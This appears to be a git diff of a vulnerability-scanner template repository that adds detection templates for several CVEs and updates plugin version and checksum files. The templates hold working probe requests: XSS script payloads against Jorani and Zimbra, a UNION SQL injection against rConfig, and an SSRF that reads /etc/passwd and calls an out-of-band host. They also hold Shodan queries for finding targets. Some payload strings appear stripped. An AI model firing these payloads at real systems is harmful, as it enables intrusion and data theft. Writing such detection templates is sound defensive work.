diff --git a/.new-additions b/.new-additions index 4842155e806..f8e33bf79fa 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,9 @@ http/cnvd/2021/CNVD-2021-32799.yaml http/cves/2016/CVE-2016-10108.yaml +http/cves/2018/CVE-2018-15917.yaml +http/cves/2020/CVE-2020-10220.yaml http/cves/2020/CVE-2020-11798.yaml +http/cves/2021/CVE-2021-46107.yaml http/cves/2022/CVE-2022-22897.yaml http/cves/2023/CVE-2023-20073.yaml http/cves/2023/CVE-2023-26469.yaml @@ -8,6 +11,7 @@ http/cves/2023/CVE-2023-27034.yaml http/cves/2023/CVE-2023-30150.yaml http/cves/2023/CVE-2023-32563.yaml http/cves/2023/CVE-2023-34124.yaml +http/cves/2023/CVE-2023-34192.yaml http/cves/2023/CVE-2023-36844.yaml http/exposed-panels/aspcms-backend-panel.yaml http/exposed-panels/greenbone-panel.yaml diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt index f15ec04e09e..3b5ab14de2a 100644 --- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt +++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt @@ -1 +1 @@ -4.4.4 \ No newline at end of file +4.4.5.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/better-wp-security.txt b/helpers/wordpress/plugins/better-wp-security.txt index 5f82703f924..1c61cc5bd96 100644 --- a/helpers/wordpress/plugins/better-wp-security.txt +++ b/helpers/wordpress/plugins/better-wp-security.txt @@ -1 +1 @@ -8.1.7 \ No newline at end of file +8.1.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/broken-link-checker.txt b/helpers/wordpress/plugins/broken-link-checker.txt index fae692e41d4..7e541aec69b 100644 --- a/helpers/wordpress/plugins/broken-link-checker.txt +++ b/helpers/wordpress/plugins/broken-link-checker.txt @@ -1 +1 @@ -2.2.1 \ No newline at end of file +2.2.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cookie-law-info.txt b/helpers/wordpress/plugins/cookie-law-info.txt index 6ebad148881..711ee4f504a 100644 --- a/helpers/wordpress/plugins/cookie-law-info.txt +++ b/helpers/wordpress/plugins/cookie-law-info.txt @@ -1 +1 @@ -3.1.2 \ No newline at end of file +3.1.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loco-translate.txt b/helpers/wordpress/plugins/loco-translate.txt index e46a05b1967..68167133b95 100644 --- a/helpers/wordpress/plugins/loco-translate.txt +++ b/helpers/wordpress/plugins/loco-translate.txt @@ -1 +1 @@ -2.6.4 \ No newline at end of file +2.6.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/maintenance.txt b/helpers/wordpress/plugins/maintenance.txt index 109b44a452d..497104f6201 100644 --- a/helpers/wordpress/plugins/maintenance.txt +++ b/helpers/wordpress/plugins/maintenance.txt @@ -1 +1 @@ -4.07 \ No newline at end of file +4.08 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ml-slider.txt b/helpers/wordpress/plugins/ml-slider.txt index ebb8439a9bb..0dc31e89d8c 100644 --- a/helpers/wordpress/plugins/ml-slider.txt +++ b/helpers/wordpress/plugins/ml-slider.txt @@ -1 +1 @@ -3.36.0 \ No newline at end of file +3.37.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index f9da12e1184..c0be8a7992a 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -6.3.2 \ No newline at end of file +6.4.0 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml new file mode 100644 index 00000000000..0cee8304d1b --- /dev/null +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -0,0 +1,50 @@ +id: CVE-2018-15917 + +info: + name: Jorani Leave Management System 0.6.5 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language. + reference: + - https://www.exploit-db.com/exploits/45338 + - https://nvd.nist.gov/vuln/detail/CVE-2018-15917 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2018-15917 + cwe-id: CWE-79 + metadata: + max-request: 2 + verified: true + shodan-query: title:"Login - Jorani" + tags: cve,cve2018,jorani,xss + +http: + - raw: + - | + GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1 + Host: {{Hostname}} + + - | + GET /session/login HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - '_jorani' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml new file mode 100644 index 00000000000..860bb427fd0 --- /dev/null +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-10220 + +info: + name: rConfig 3.9 - SQL injection + author: ritikchaddha + severity: critical + description: | + An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter. + reference: + - http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-10220 + classification: + cve-id: CVE-2020-10220 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + shodan-query: title:"rConfig" + tags: cve,cve2020,rconfig,sqli + +variables: + num: "999999999" + +http: + - raw: + - | + GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index ffe2cb9506b..b6f06735253 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -18,21 +18,23 @@ info: cvss-score: 8.2 cve-id: CVE-2020-13379 cwe-id: CWE-918 - epss-score: 0.16322 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + epss-score: 0.16322 metadata: - max-request: 1 + max-request: 2 + product: grafana shodan-query: title:"Grafana" - verified: true vendor: grafana - product: grafana + verified: true tags: cve,cve2020,grafana,ssrf http: - method: GET path: - "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" + - "{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" + stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml new file mode 100644 index 00000000000..466d24fa8a6 --- /dev/null +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-46107 + +info: + name: Ligeo Archives Ligeo Basics - Server Side Request Forgery + author: ritikchaddha + severity: high + description: | + Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features. + reference: + - https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py + - https://nvd.nist.gov/vuln/detail/CVE-2021-46107 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-46107 + cwe-id: CWE-918 + metadata: + fofa-query: title="Ligeo" + max-request: 3 + shodan-query: title:"Ligeo" + verified: true + tags: cve,cve2021,ligeo,ssrf,lfr + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + GET /archive/download?file=file:///etc/passwd HTTP/1.1 + Host: {{Hostname}} + + - | + GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')" + - "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')" diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 0485651b64e..f4d9a59974a 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -1,11 +1,12 @@ id: CVE-2022-2627 info: - name: WordPress Newspaper <12 - Cross-Site Scripting - author: ramondunker + name: WordPress Newspaper < 12 - Cross-Site Scripting + author: ramondunker,c4sper0 severity: medium description: | WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. + remediation: Fixed in version 12 reference: - https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea - https://nvd.nist.gov/vuln/detail/CVE-2022-2627 @@ -18,6 +19,8 @@ info: cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + verified: true + publicwww-query: "/wp-content/themes/Newspaper" framework: wordpress vendor: tagdiv product: newspaper @@ -26,19 +29,23 @@ info: http: - raw: - | - POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/2 + POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1 Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - action=td_ajax_search&td_string=tej2j1q%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3emvufr + action=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]= + + payloads: + xss_payload: + - "
" matchers-condition: and matchers: - type: word part: body words: - - '' - - '/newspaper' - case-insensitive: true + -
+ - td-block- condition: and - type: word diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml new file mode 100644 index 00000000000..d497b6c3e9d --- /dev/null +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -0,0 +1,52 @@ +id: CVE-2023-34192 + +info: + name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting + author: ritikchaddha + severity: high + description: | + Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function. + reference: + - https://mp.weixin.qq.com/s/Vz8yL4xBlZN5EQQ_BG0OOA + - https://www.helpnetsecurity.com/2023/07/17/cve-2023-34192/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-34192 + classification: + cve-id: CVE-2023-34192 + metadata: + fofa-query: icon_hash="475145467" + max-request: 2 + shodan-query: http.favicon.hash:475145467 + tags: cve,cve2023,zimbra,xss,authenticated + +http: + - raw: + - | + POST /zimbra/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginOp=login&username={{username}}&password={{password}}&client=preferred + + - | + GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "" + - "zimbra" + condition: and + + - type: word + part: header_2 + words: + - text/html + + - type: status + part: header_2 + status: + - 200 diff --git a/http/miscellaneous/apple-app-site-association.yaml b/http/miscellaneous/apple-app-site-association.yaml index e121f492a92..ba827693c1b 100644 --- a/http/miscellaneous/apple-app-site-association.yaml +++ b/http/miscellaneous/apple-app-site-association.yaml @@ -34,3 +34,8 @@ http: - type: status status: - 200 + + extractors: + - type: json + json: + - .applinks.details[].appID \ No newline at end of file diff --git a/http/vulnerabilities/other/rconfig-file-upload.yaml b/http/vulnerabilities/other/rconfig-file-upload.yaml index 3604834e617..b3635e1d8ac 100644 --- a/http/vulnerabilities/other/rconfig-file-upload.yaml +++ b/http/vulnerabilities/other/rconfig-file-upload.yaml @@ -1,20 +1,23 @@ -id: rconfig-rce +id: rconfig-file-upload info: name: rConfig 3.9.5 - Arbitrary File Upload author: dwisiswant0 severity: high - description: rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + description: | + rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.5.zip + - https://www.exploit-db.com/exploits/48878 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cwe-id: CWE-434 - reference: - - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - - https://www.exploit-db.com/exploits/48878 - tags: rconfig,rce,edb metadata: max-request: 1 + shodan-query: title:"rConfig" + verified: true + tags: rconfig,rce,edb,file-upload,instrusive http: - raw: diff --git a/templates-checksum.txt b/templates-checksum.txt index 146ee08a5fe..f7531e1a1fc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -367,7 +367,7 @@ helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7d helpers/wordpress/plugins/advanced-custom-fields.txt:358a36934535cdb0f43c2bd34f8032939c89dee3 helpers/wordpress/plugins/akismet.txt:4380b93c5f9e9e252ac9ac548449d65f955603c4 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f -helpers/wordpress/plugins/all-in-one-seo-pack.txt:5e3c54ec1686b257c15fe3bd98af9e08d983b8ab +helpers/wordpress/plugins/all-in-one-seo-pack.txt:bf1d607adfeedd476ba3e3fba79a756e25035222 helpers/wordpress/plugins/all-in-one-wp-migration.txt:addf63c8a9f97e52b5b7aca6dc435f3680b17d2a helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:32caf6abda6a7a1a799e1775e6c5b3e7e32ad59f helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57 @@ -377,11 +377,11 @@ helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a helpers/wordpress/plugins/autoptimize.txt:661ae89c9a4b16c450c2a094d410c4ee74719cb3 helpers/wordpress/plugins/backwpup.txt:063ee00ca80d81e068dd404b59ceb2a03b2e7109 helpers/wordpress/plugins/better-search-replace.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/better-wp-security.txt:c54fa79bac14562d677ca2be716dc363653d1cd4 +helpers/wordpress/plugins/better-wp-security.txt:ddc49152d337977df228a63c029f8c815c822ce2 helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/breadcrumb-navxt.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b helpers/wordpress/plugins/breeze.txt:7277d832c4a280d1c4cd0f4bf3169bf93d46d49e -helpers/wordpress/plugins/broken-link-checker.txt:bf64dd8c92190417a38d834b0c92eee4be757761 +helpers/wordpress/plugins/broken-link-checker.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/child-theme-configurator.txt:8e805063c85859847271163a1c51e5865e460aea helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 @@ -395,7 +395,7 @@ helpers/wordpress/plugins/complianz-gdpr.txt:b12395a5190cbd66359bb94c3f32f0635e3 helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/contact-form-7.txt:77526ddfb1469f41739fcab554059141c36d9329 helpers/wordpress/plugins/contact-form-cfdb7.txt:c6802dfc6ada46af8820db93c237d00787bd441c -helpers/wordpress/plugins/cookie-law-info.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 +helpers/wordpress/plugins/cookie-law-info.txt:049a35ad82b9c914dc50f602563d1e37e06ef9a6 helpers/wordpress/plugins/cookie-notice.txt:6b67ce6c1930ff8e1d5003aeb8218f8fbdd4e6d2 helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:5c09cf3589e93781df4d59ed6b5a5d6207e2929c @@ -458,19 +458,19 @@ helpers/wordpress/plugins/leadin.txt:4ea6749184af2616dda4c6d36597b267338ca299 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:eb7b3babdf22a684d0ea8660470e63f0a4a6f2d6 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:a2246273db175b4d951c8ae09a9b87d55b422463 -helpers/wordpress/plugins/loco-translate.txt:5f099bc6f95ad230bf3e17b9745270e13ee50606 +helpers/wordpress/plugins/loco-translate.txt:c1c423f2f1813573ad1b704e4b6aea927ed8deb9 helpers/wordpress/plugins/loginizer.txt:9829113ed356f261f9202f78259f32919e9e5d9b helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:d962fd9a839a218de0c95dddb4f7e937cdd40d38 helpers/wordpress/plugins/mailpoet.txt:4e0e9b8af035e0887466f99581b3657149805e2c -helpers/wordpress/plugins/maintenance.txt:254b136ca21ea7ce53096fd367ddb29c22a7cce9 +helpers/wordpress/plugins/maintenance.txt:676c72a3610df638213dbd14937d1a1d3541b924 helpers/wordpress/plugins/mainwp-child.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e helpers/wordpress/plugins/malcare-security.txt:110e72e19320b384e7459b22647e5acdb0255c57 helpers/wordpress/plugins/megamenu.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 helpers/wordpress/plugins/members.txt:237c8767860dc44f0f30057d25e9143e3d0b425f helpers/wordpress/plugins/meta-box.txt:1f35081e09d2a2ed9d9cb39777ed8121a68d0cee -helpers/wordpress/plugins/ml-slider.txt:32f71be2b08c58a10d49f26fdb35bf06c8f20122 +helpers/wordpress/plugins/ml-slider.txt:f6b24d20fb8ca8547810ce73f202e02919d356e0 helpers/wordpress/plugins/newsletter.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655 helpers/wordpress/plugins/nextgen-gallery.txt:f2cc8874a54d8d40b341d84839c1b2984efc0aba @@ -536,7 +536,7 @@ helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:381bb12da04a82580bb6 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:85e58fba8dcfa56b29939775178a4af11946316b -helpers/wordpress/plugins/woocommerce-payments.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6 +helpers/wordpress/plugins/woocommerce-payments.txt:f761ee50908e2e01cb058b4b2f46366c4d288e93 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:cc1586242918f22469f32e7d30bae9a88f411c48 helpers/wordpress/plugins/woocommerce-services.txt:7cfe54f27289e2e996bf2e77df14202ff94111f9 @@ -1120,6 +1120,7 @@ http/cves/2018/CVE-2018-15138.yaml:36f31a268f34ecb7d3bc9dbb8780a3331a0a85a0 http/cves/2018/CVE-2018-15517.yaml:630aa932c228a3d5ab7535ce105b7221c784375f http/cves/2018/CVE-2018-15535.yaml:5a976b8f0b17f4042a90bde5f49012c04bd0ee9a http/cves/2018/CVE-2018-15745.yaml:367ddf7a4c089a1476fe48716e69e9b0e8594190 +http/cves/2018/CVE-2018-15917.yaml:ea9408feec6802710f83f0e55caeec4aa7652fb9 http/cves/2018/CVE-2018-15961.yaml:cb650b9eb6d6106d7fdd8ee6d9caf616396c0339 http/cves/2018/CVE-2018-16059.yaml:346b58eb5f9f9828c0a43fe5de951bef08d6f84e http/cves/2018/CVE-2018-16133.yaml:887665262f6debceddc70e7f66ca2bb21a791555 @@ -1378,6 +1379,7 @@ http/cves/2019/CVE-2019-9978.yaml:29fa05916d940a02b2052750609450962d826369 http/cves/2020/CVE-2020-0618.yaml:fb8a86443513fb8dfb8bfd4ef48846be61fbd046 http/cves/2020/CVE-2020-10148.yaml:785c887c894285e141a8c3ec6d81dbf0ca321825 http/cves/2020/CVE-2020-10199.yaml:148ba582f0b0a858b2974d29715f40352211ead0 +http/cves/2020/CVE-2020-10220.yaml:d4198c17d90c22e291f9ffcf41aa5838efcb3b70 http/cves/2020/CVE-2020-10546.yaml:064a059d47a385fd83a9b1b62793b5891e9e5b07 http/cves/2020/CVE-2020-10547.yaml:58b39f2460d859c96b62ab0697151b9d6334808e http/cves/2020/CVE-2020-10548.yaml:379ae6d4c78187bc1e20dcf6ec9fb27ede275db3 @@ -1412,7 +1414,7 @@ http/cves/2020/CVE-2020-13121.yaml:9dc7b16d238c0f459e1c859af2eee995a490a654 http/cves/2020/CVE-2020-13158.yaml:f62235f5a3b204038b3da15490ab9114643183b8 http/cves/2020/CVE-2020-13167.yaml:65c3c0a11291c74e4ccb4e0b79ed0957d0a8de7c http/cves/2020/CVE-2020-13258.yaml:aa3db4375fb4584fac99169f08ac1cda299855f3 -http/cves/2020/CVE-2020-13379.yaml:4c62c2dda3258e27300b0607a29312d19622297d +http/cves/2020/CVE-2020-13379.yaml:05f9450e2fd21df27c555b164451a4c25a308a68 http/cves/2020/CVE-2020-13405.yaml:364c8a655d463164f79a3da5c045565d4fa9ff57 http/cves/2020/CVE-2020-13483.yaml:34af617d306d7bf273b42a8056f5025cd910a442 http/cves/2020/CVE-2020-13700.yaml:1a7bc8e4b8c9e42c098330b55f7f2365e48c71ca @@ -2031,6 +2033,7 @@ http/cves/2021/CVE-2021-46069.yaml:4a66853e90d99951c71c877bb4f3912ad58d21ca http/cves/2021/CVE-2021-46071.yaml:e72f5409191f3fdcf79c20316aa900616aea5d91 http/cves/2021/CVE-2021-46072.yaml:a2b12e554f7f5713084305bf3f5a005a43dc0cd4 http/cves/2021/CVE-2021-46073.yaml:b3b6ebe4a5cad18f2900529a17d133cbcc048238 +http/cves/2021/CVE-2021-46107.yaml:a1658d92714c11c9665ff45882cb7458bb5f4f8c http/cves/2021/CVE-2021-46379.yaml:9cef057ba92e93d700d00e0a80569c02278c6cd6 http/cves/2021/CVE-2021-46381.yaml:55315c21c062982a73fcf7ef3b843e59c25f6953 http/cves/2021/CVE-2021-46387.yaml:224cf815250e716166a2f1a7abce55b048ab93a6 @@ -2233,7 +2236,7 @@ http/cves/2022/CVE-2022-26148.yaml:3d63c3c54ccceebb6834e30ac08e30ba14cabeea http/cves/2022/CVE-2022-26159.yaml:3b77229394b437c585c570e3253c1f56690a2bb5 http/cves/2022/CVE-2022-26233.yaml:bf0b2d1e3cc09228bb8fa9cdedf39d425dd73adc http/cves/2022/CVE-2022-26263.yaml:28ef01e032bc2a5fe99e8de5677f4350b711d1e7 -http/cves/2022/CVE-2022-2627.yaml:f77c674bb02e26f164b54012aaadd31242e72d30 +http/cves/2022/CVE-2022-2627.yaml:d026b886c144d021596fa224edc521639a3c4a05 http/cves/2022/CVE-2022-2633.yaml:eb0d6e871e026e54ea530a19ee544c7523a43515 http/cves/2022/CVE-2022-26352.yaml:117ad67580f651f62733b47d50fd68de369bacbe http/cves/2022/CVE-2022-26564.yaml:48eeb6c3f3af813ff7f60114e697000288d5e80d @@ -2591,6 +2594,7 @@ http/cves/2023/CVE-2023-3345.yaml:81aa4e514ec7e42c0c04e9525c0a07dc2023e301 http/cves/2023/CVE-2023-33510.yaml:2c13c6f56ab0416bdd7e53d28814a6f565302605 http/cves/2023/CVE-2023-33568.yaml:eb301b833721e18854829e2af5f33287788bd00e http/cves/2023/CVE-2023-34124.yaml:bb268f4fb1c4909a6897e8275b1f5f60fcb8886f +http/cves/2023/CVE-2023-34192.yaml:8affac232592b125b819252a29ac21b5e6f40b05 http/cves/2023/CVE-2023-34362.yaml:c3e8ebce7d7e6d851ee37989c43faa13f3fb8c82 http/cves/2023/CVE-2023-34537.yaml:961d0827d05c1234d0e00da2ed0ae49f08d0d9de http/cves/2023/CVE-2023-34598.yaml:e6d11470360f77660a6b9751e2a68c368fc03d29 @@ -4220,7 +4224,7 @@ http/iot/webtools-home.yaml:8fac1b9a4c40b7a99a33895c75dcd2be623e1965 http/iot/xp-webcam.yaml:6a17a29da87ffe3b4a382c6ed2e4ca38c148e54e http/iot/zebra-printer-detect.yaml:3ac7d5f177a91a5ee89411ead8e073a72a10997e http/miscellaneous/addeventlistener-detect.yaml:49f913e72df50e18eb80458c9fbb5df10d4253b6 -http/miscellaneous/apple-app-site-association.yaml:c6da929223cda667179226cfba083fc9692c7dac +http/miscellaneous/apple-app-site-association.yaml:541c9e23a52f733b557f3e0a7edee2d9d66069b8 http/miscellaneous/aws-ecs-container-agent-tasks.yaml:e19643775ad6c43b074bc8773f31dce3dba3fd05 http/miscellaneous/clientaccesspolicy.yaml:d2ebcdf18a9e115d28ec5418618dde3de28439b6 http/miscellaneous/crypto-mining-malware.yaml:253d42ee74ffdb0947f1ec2df0ae4f2a5645bedb @@ -6575,7 +6579,7 @@ http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml:67 http/vulnerabilities/other/qihang-media-disclosure.yaml:dad6da0182625d9a95acdfec0df21b049c4daa8d http/vulnerabilities/other/qihang-media-lfi.yaml:3b581630106e3bd04f75366c9076ee8f1b8e8832 http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml:2382325fe062c56d0e35cc5384647750325f58dd -http/vulnerabilities/other/rconfig-file-upload.yaml:bb0dc040e78ff6d9e6208aae64bf290ece7641a4 +http/vulnerabilities/other/rconfig-file-upload.yaml:b69bd7f2506e74dc3031fd6c5c4bab47e3f7f7fe http/vulnerabilities/other/reddittop-rss-xss.yaml:03df8cb7029692c3157660f0aca9c22ee86884a8 http/vulnerabilities/other/resin-cnnvd-200705-315.yaml:4d3d645b58f506e86281f8dd0b487c34b6f6bbb5 http/vulnerabilities/other/resin-inputfile-fileread.yaml:99d1e9dc54f4ee317305d67f01721d137ddbd9d5 @@ -7028,7 +7032,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:b3331acaaf83635e0a2917f1d34fac12751dc777 +templates-checksum.txt:8c5aa2ad4577d9ce37eb4de08321af79e42ff3b3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f